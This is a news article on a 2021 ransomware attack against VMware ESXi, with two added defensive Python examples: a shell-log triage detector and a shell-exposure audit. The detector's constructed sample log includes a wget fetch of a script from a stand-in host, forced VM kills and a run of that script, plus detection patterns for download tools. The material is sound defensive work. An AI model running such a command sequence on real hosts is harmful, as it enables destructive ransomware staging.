BlackMatter, HelloKitty, and REvil among groups targeting VMware’s ESXi hypervisor
Mathew J. Schwartz (euroinfosec)
October 5, 2021
How fast can ransomware attackers strike? In one case, it took one or more ransomware attackers about three hours to gain initial access to a target, escalate their attack, and deploy crypto-locking malware.
That’s what security firm Sophos says in a new report detailing a ransomware attack that hit the victim’s installation of VMware ESXi, an enterprise-class hypervisor designed to partition physical servers into multiple virtual machines.
“This is one of the fastest ransomware attacks Sophos has ever investigated and it appears to target the ESXi platform with precision,” says Andrew Brandt, senior researcher at Sophos.
The attack is notable not only for its speed, but also for a list of defensive mistakes made by the victim – mistakes that, had they been avoided, might have repelled the attack – including leaving unnecessary features enabled and not using multi-factor authentication to lock down remote access tools, especially for users with administrator-level access to back-end systems.
Hitting a hypervisor gives attackers the ability to forcibly encrypt many different systems at once. If the hypervisor hosts a multi-tenant environment, attackers may furthermore be able to crypto-lock systems used by multiple organizations, giving them more victims to extort.
“ESXi servers represent an attractive target for ransomware threat actors because they can attack multiple virtual machines at a time, where each of the virtual machines could run business-critical applications or services,” says Brandt. “Attacks on hypervisors can be both rapid and very disruptive. Ransomware operators, including DarkSide and REvil, have targeted ESXi servers in attacks.”
ESXi targeting groups
Sophos did not attribute the attack it investigated to any particular ransomware group.
But as Brandt notes, several groups have been seen targeting ESXi. They include REvil, also known as Sodinokibi, which was the dominant strain of ransomware seen in the second quarter of 2021 before subsiding over the summer. The ransomware group has recently resumed operations.
After also disappearing over the summer, DarkSide appears to have been reborn as BlackMatter. In August, the MalwareHunterTeam security research group warned that BlackMatter continues to use a Linux version of the DarkSide malware developed to target ESXi environments. It includes the ability to run ESXi shell commands, and therefore to force virtual machines to shut down so that they can be encrypted and held for ransom.
In July, meanwhile, Doel Santos and Ruchna Nigam of Palo Alto Networks’ Unit 42 threat research group warned that they had spotted “a Linux variant of HelloKitty targeting VMware’s ESXi hypervisor, which is widely used in cloud and on-premises data centers” (see: 7 new ransomware groups practicing double extortion).
Attackers use Python
In its report, Sophos says the attackers managed to drop a Python script onto a server running ESXi, where Python is installed by default.
What is unclear is how many other organizations attackers attempted to target before successfully reaching this one.
Sophos did not immediately respond to a request for additional information about the victim, such as the industry and geography in which they operate.
But many aspects of the attackers’ MO aren’t new, including hitting the victim on a weekend, when IT teams are less likely to spot an intrusion or be able to stop it quickly.
Luckily for the attackers, Sophos says they appear to have found the ESXi Shell enabled on the hypervisor. Administrators use the shell for routine maintenance, including installing updates, but it is typically disabled again afterwards for security reasons.
Early Sunday morning strike
Here is a timeline of the attack as detailed by Sophos, in the victim’s local time, early on a Sunday morning:
- 00:30: Attackers gain access to TeamViewer remote access and control software running on a computer assigned to a user who also holds Active Directory domain administrator credentials. The TeamViewer software was not protected by multi-factor authentication, so the attackers likely gained entry by brute-forcing the credentials.
- 00:40: Attackers use the free Advanced IP Scanner tool to identify an ESXi server, then discover that administrators have left the ESXi Shell enabled. The attackers connect to it remotely using the Bitvise SSH client, then download a Python script to the server.
- 03:40: The attackers run the Python script, which maps the datastore directories and inventories the virtual machines, then shuts each one down and encrypts every virtual disk hosted on the ESXi server, leaving a ransom note.
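The timeline above is also a detection opportunity: the interactive steps (enumerating VMs, staging a script, forcibly powering off several VMs in a burst, then running the payload) are recorded as shell history on the host. The following is an added example, not code from Sophos or VMware, that triages such history for exactly that sequence. The log lines are constructed and only approximate ESXi’s /var/log/shell.log layout (ISO timestamp, `shell[pid]:`, `[user]:`, the command typed); the power-off threshold is an assumed value. Commands a script executes on its own are not written to shell.log, so this catches the operator’s interactive steps; a fuller detector would also read hostd.log for VM power-state changes.

```python
"""Triage ESXi shell history for the sequence seen in the attack above:
VM inventory, tooling staged onto the host, a burst of forced VM power-offs,
then payload execution. Added example, not Sophos' or VMware's code.
Sample lines are constructed and approximate /var/log/shell.log's layout."""
import re
from dataclasses import dataclass, field
from datetime import datetime, timezone

# Constructed sample. PID, VM world ids and the download host are invented.
SAMPLE_SHELL_LOG = """\
2021-10-03T00:41:12Z shell[2100340]: [root]: ls /vmfs/volumes/
2021-10-03T00:42:05Z shell[2100340]: [root]: vim-cmd vmsvc/getallvms
2021-10-03T00:43:51Z shell[2100340]: [root]: wget http://example.invalid/enc.py -O /tmp/enc.py
2021-10-03T03:38:20Z shell[2100340]: [root]: esxcli vm process list
2021-10-03T03:39:01Z shell[2100340]: [root]: esxcli vm process kill -t force -w 2100911
2021-10-03T03:39:03Z shell[2100340]: [root]: esxcli vm process kill -t force -w 2100954
2021-10-03T03:39:06Z shell[2100340]: [root]: esxcli vm process kill -t force -w 2101002
2021-10-03T03:40:10Z shell[2100340]: [root]: python /tmp/enc.py /vmfs/volumes/datastore1
"""

LINE_RE = re.compile(
    r"^(?P<ts>\S+Z) shell\[(?P<pid>\d+)\]: \[(?P<user>[^\]]+)\]: (?P<cmd>.*)$"
)

# Rule name -> regex over the command text. Each alone is routine admin work;
# the combination and the burst are what matter.
RULES = {
    "inventory": re.compile(r"\b(vim-cmd vmsvc/getallvms|esxcli vm process list)\b"),
    "power_off": re.compile(r"\b(esxcli vm process kill|vim-cmd vmsvc/power\.off)\b"),
    "staging": re.compile(r"\b(wget|curl|scp)\b"),
    "script_exec": re.compile(r"\bpython\S*\s"),
    "encryption_tool": re.compile(r"\bopenssl\s+enc\b"),
}
MASS_POWER_OFF_THRESHOLD = 3  # assumed value; tune to the host's VM count


@dataclass
class Finding:
    ts: datetime
    user: str
    rule: str
    cmd: str


@dataclass
class TriageResult:
    findings: list = field(default_factory=list)
    power_offs: int = 0
    mass_power_off: bool = False
    elapsed_minutes: float = 0.0
    verdict: str = "no indicators"


def parse_ts(text):
    return datetime.strptime(text, "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)


def triage_shell_log(log_text):
    """Parse shell-history lines, apply the rules, and rate the whole sequence."""
    result = TriageResult()
    for raw in log_text.splitlines():
        m = LINE_RE.match(raw)
        if not m:
            continue  # not a shell-history line; ignore
        for name, rx in RULES.items():
            if rx.search(m["cmd"]):
                result.findings.append(Finding(parse_ts(m["ts"]), m["user"], name, m["cmd"]))
    if not result.findings:
        return result
    seen = {f.rule for f in result.findings}
    result.power_offs = sum(1 for f in result.findings if f.rule == "power_off")
    # Inventory followed by a burst of forced power-offs is the pre-encryption
    # step; a single power-off with no inventory is ordinary maintenance.
    result.mass_power_off = "inventory" in seen and result.power_offs >= MASS_POWER_OFF_THRESHOLD
    first, last = result.findings[0].ts, result.findings[-1].ts
    result.elapsed_minutes = round((last - first).total_seconds() / 60, 1)
    if result.mass_power_off and seen & {"script_exec", "encryption_tool"}:
        result.verdict = "likely ransomware staging: mass VM shutdown plus payload execution"
    elif result.mass_power_off:
        result.verdict = "mass VM shutdown after inventory: investigate"
    elif seen & {"staging", "script_exec"}:
        result.verdict = "tooling dropped or run from ESXi Shell: review"
    else:
        result.verdict = "isolated indicators"
    return result


if __name__ == "__main__":
    r = triage_shell_log(SAMPLE_SHELL_LOG)
    print(f"{r.verdict} ({r.power_offs} power-offs over {r.elapsed_minutes} min)")
    for f in r.findings:
        print(f.ts.isoformat(), f.user, f.rule, f.cmd)
```

Run against the constructed sample, the verdict is the high-severity one and the elapsed window between the first and last flagged command is just under three hours, matching the speed Sophos describes. Forwarding shell.log off the host (ESXi supports remote syslog) matters here, because a host whose disks are about to be encrypted is the wrong place to keep the only copy of the evidence.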
The point to remember for any organization running a hypervisor is that attackers make a habit of targeting them, which means defenders have to put the proper defenses in place.
“This includes the use of unique, hard-to-brute-force passwords and the application of multi-factor authentication where possible,” says Brandt, in particular for remote access accounts, including Remote Desktop Protocol and TeamViewer.
To help organizations using ESXi, VMware has released a hypervisor security guide.
Beyond minimizing access, especially for administrators – including regularly auditing Active Directory access levels – Sophos also recommends using virtual LANs, or VLANs, to segment critical servers, including ESXi hosts, to make them harder to attack.
“The ESXi Shell can and should be disabled whenever it is not in use by personnel for routine maintenance, for example, when installing patches,” says Brandt. “The IT team can do this either by using commands on the server console or through the software management tools provided by the vendor.”
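The condition the attackers found, an ESXi Shell left enabled with no timeout, is easy to check for and to close from the console. The following is an added example, not Sophos’ or VMware’s code, that audits captured output from two real ESXi commands, `chkconfig --list` (service on/off table; the shell is the `TSM` service and SSH is `TSM-SSH`) and `esxcli system settings advanced list -o <path>` (a `key: value` block), and emits the documented `vim-cmd`/`esxcli` commands that disable the shell and make it time out on its own. The sample captures are constructed and approximate those layouts; the 900-second timeout is an assumed hardening value.

```python
"""Audit whether an ESXi host leaves its shell open, the condition found in the
attack above, and produce the commands that close it again.
Added example, not Sophos' or VMware's code. The captures below are constructed
and approximate the output of 'chkconfig --list' and
'esxcli system settings advanced list -o <path>' on ESXi."""
import re

# Constructed capture of 'chkconfig --list', trimmed to the services of interest.
SAMPLE_CHKCONFIG = """\
TSM                   on
TSM-SSH               on
ntpd                  on
"""

# Constructed capture of 'esxcli system settings advanced list -o /UserVars/ESXiShellTimeOut'
# followed by the same for ESXiShellInteractiveTimeOut. A value of 0 means "never".
SAMPLE_ADVANCED = """\
   Path: /UserVars/ESXiShellTimeOut
   Type: integer
   Int Value: 0
   Default Int Value: 0
   Min Value: 0
   Max Value: 86400
   Description: Time before automatically disabling local and remote shell access (in seconds, 0 disables).
   Path: /UserVars/ESXiShellInteractiveTimeOut
   Type: integer
   Int Value: 0
   Default Int Value: 0
   Min Value: 0
   Max Value: 86400
   Description: Idle time before an interactive shell is automatically logged out (in seconds, 0 disables).
"""

SHELL_TIMEOUT_SECONDS = 900  # assumed hardening value: 15 minutes
TIMEOUT_PATHS = ("/UserVars/ESXiShellTimeOut", "/UserVars/ESXiShellInteractiveTimeOut")


def parse_chkconfig(text):
    """Return {service: 'on'|'off'} from chkconfig --list style lines."""
    services = {}
    for line in text.splitlines():
        m = re.match(r"^(\S+)\s+(on|off)\s*$", line.strip())
        if m:
            services[m.group(1)] = m.group(2)
    return services


def parse_advanced(text):
    """Return {path: int value} from one or more 'Path: ... Int Value: ...' blocks."""
    values, path = {}, None
    for line in text.splitlines():
        key, _, val = line.strip().partition(":")
        key, val = key.strip(), val.strip()
        if key == "Path":
            path = val
        elif key == "Int Value" and path is not None:
            values[path] = int(val)
    return values


def audit_shell_exposure(chkconfig_text, advanced_text):
    """Report enabled shell/SSH services and zero timeouts, with the fixing commands."""
    services = parse_chkconfig(chkconfig_text)
    timeouts = parse_advanced(advanced_text)
    findings, fixes = [], []
    if services.get("TSM") == "on":
        findings.append("ESXi Shell (TSM) is enabled")
        fixes += ["vim-cmd hostsvc/stop_esx_shell", "vim-cmd hostsvc/disable_esx_shell"]
    if services.get("TSM-SSH") == "on":
        findings.append("SSH (TSM-SSH) is enabled")
        fixes += ["vim-cmd hostsvc/stop_ssh", "vim-cmd hostsvc/disable_ssh"]
    for path in TIMEOUT_PATHS:
        if timeouts.get(path) == 0:
            findings.append(f"{path} is 0: an enabled shell never times out")
            fixes.append(f"esxcli system settings advanced set -o {path} -i {SHELL_TIMEOUT_SECONDS}")
    return {"findings": findings, "fixes": fixes, "compliant": not findings}


if __name__ == "__main__":
    report = audit_shell_exposure(SAMPLE_CHKCONFIG, SAMPLE_ADVANCED)
    for f in report["findings"]:
        print("FINDING:", f)
    for cmd in report["fixes"]:
        print("FIX:", cmd)
```

On a host that does need the shell for a patch window, the timeout settings are the part worth keeping even when the shell is enabled: they make the host revert to the closed state on its own, rather than relying on an administrator remembering to disable it afterwards. The same settings can be applied centrally through vCenter’s host advanced settings, which is the vendor management route Brandt refers to.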